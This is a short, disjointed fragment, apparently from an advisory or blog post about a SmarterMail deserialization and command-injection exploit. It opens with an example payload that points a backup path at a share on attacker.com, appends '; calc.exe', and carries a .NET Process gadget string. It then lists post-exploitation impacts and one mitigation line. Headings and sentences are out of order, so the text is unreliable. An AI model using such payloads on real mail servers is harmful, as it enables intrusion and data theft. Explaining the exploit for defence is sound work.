"command": "RestoreFromSharedPath", "backupPath": "\\attacker.com\share\backup.zip; calc.exe", "options": "deserialize": "__type=System.Diagnostics.Process+StartInfo, System, Version=4.0.0.0 ..."
Once the attacker has code execution, they can dump user databases, read private emails, or use the mail server as a jumping-off point to move laterally through the rest of the corporate network.

How the Exploit Works (High-Level)
: Improving how the application handles serialized data to prevent arbitrary command execution.

Related Security Issues
The SmarterMail 6919 exploit underscores three timeless truths: